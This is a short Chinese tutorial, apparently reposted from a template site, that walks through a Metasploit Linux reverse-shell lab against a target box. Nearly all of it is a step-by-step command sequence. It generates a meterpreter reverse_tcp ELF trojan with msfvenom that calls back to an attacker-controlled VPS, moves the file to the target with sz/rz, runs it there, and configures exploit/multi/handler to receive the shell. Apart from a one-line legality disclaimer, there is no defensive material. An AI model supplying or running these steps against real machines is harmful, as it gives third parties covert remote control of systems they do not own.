环境如下
vps :Linux ubuntu 4.15.0-180-generic (已经打开8989端口)
win:Windows Feature Experience Pack 120.2212.4180.0(可以随意)
靶机:Linux ubuntu 4.18.0-25-generic
过程如下
1.在vps里面生成木马
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=8989 -f elf > asd
2.将木马下载到本机桌面
sz asd
3.将木马拖拽或者rz(上传)
使用rz上传、sz下载,需要安装lrzsz模块
apt install lrzsz
4.cd到木马文件的目录下,使用ll查看是否有执行权限。
5.执行木马
./asd
6.切换到vps,进入到msfconsole工具
msfconsole
7.进入到exploit/multi/handler模块,使用options查看需要配置的参数
use exploit/multi/handler
options
8.修改payload模块、lhost参数、lport参数
set payload linux/x86/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport xxxx
9.使用options查看是否配置成功,然后使用show missing
options
show missing
10.使用run执行
run
文章来源:https://www.toymoban.com/news/detail-412063.html
以上仅供参考,不得用于从事违法活动。文章来源地址https://www.toymoban.com/news/detail-412063.html
到了这里,关于msf--Linux反弹shell--一看就会的实验的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!